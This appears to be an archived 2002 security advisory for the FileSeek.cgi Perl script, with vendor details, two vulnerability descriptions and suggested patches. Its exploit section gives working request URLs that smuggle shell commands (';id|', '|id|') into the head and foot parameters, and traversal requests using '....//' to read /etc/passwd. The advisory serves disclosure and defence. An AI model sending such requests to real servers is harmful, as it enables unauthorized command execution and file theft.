Related information

CGI bugs

Snitz Forums 2000 remote SQL query manipulation vulnerability

Snitz Forums 2000 remote SQL query manipulation vulnerability

[[ TH 026 Inc. ]] SA #1 - Multiple vulnerabilities in PVote 1.5

Smalls holes on 5 products #1

From:	N|ghtHawk <nighthawk_(at)_hackers4hackers.nl>
Date:	17.04.2002
Subject:	FileSeek cgi script advisory

Best to read is the online version:
http://www.dsinet.org/textfiles/advisories/FileSeek-advisory.txt



------------------------------
FileSeek cgi script Advisory
------------------------------

FileSeek.cgi / FileSeek2.cgi
16/04/2002
- by Thijs Bosschert (nighthawk@hackers4hackers.org)

-------------------
Vendor Information:
-------------------
Homepage        : http://www.cgi-perl.com
Written by : Craig Patchett
Vendor informed
About bug : Months ago
Mailed advisory: 14/04/02
Vender Response : None yet
Version on site : Still vulnerable


-------------------
Description:
-------------------
FileSeek is a cgi-script from "The CGI/Perl Cookbook from John Wiley &
Sons". The script is written by Craig Patchett. It is being used to find
and download files on a server.

-------------------
Affected  Versions:
-------------------
All

-------------------
Vulnerability:
-------------------
There are 2 vulnerabilities in the script. The first is that the script
doesn't filter escape characters to execute commands. This flaw has been
found also by another group, the advisory of that can be found on:
http://www.russiahack.com/advisories/adviseries112.txt

The second vulnerability is a directory transversal bug which let you
read any file on the server. This because of the script filtering "../"
out of the request, which can be bypassed if the request uses "....//"
which after filtering "../" out of it leaves "../" .


-------------------
Exploit:
-------------------

Command execution vulnerability:

http://host/cgi-bin/FileSeek.cgi?head=&foot=;id|
http://host/cgi-bin/FileSeek.cgi?head=;id|&foot=

http://host/cgi-bin/FileSeek.cgi?head=&foot=|id|
http://host/cgi-bin/FileSeek.cgi?head=|id|&foot=

Directory transversal vulnerability:

http://host/cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....
//....//....//etc/passwd
http://host/cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....
//....//etc/passwd&foot=

-------------------
Patch:
-------------------

Patch for Command execution vulnerability:

Add below the "Generate HTML page" part the following code:


########################################################################
####
  # Generate the HTML page
#

########################################################################
####

  $ARGS{'head'} =~ tr/\|\;/XX/;
  $ARGS{'foot'} =~ tr/\|\;/XX/;

This will make the request bogus if it contains a ; or |, so that it
will result in an error.


Patch for Directory transversal vulnerability:

Change the following Part:

  # Make sure they're not trying to access an invalid directory

  if ($directory =~ /$DD\.\./) { $directory = '' }
  $ARGS{'head'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.
($DD|$))//g;
  $ARGS{'foot'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.
($DD|$))//g;

Into:

  # Make sure they're not trying to access an invalid directory

  if ($directory =~ /$DD\.\./) { $directory = '' }
  $ARGS{'head'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.)//g;
  $ARGS{'foot'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.)//g;

This will make it filter on ".." and not on "../"




-------------------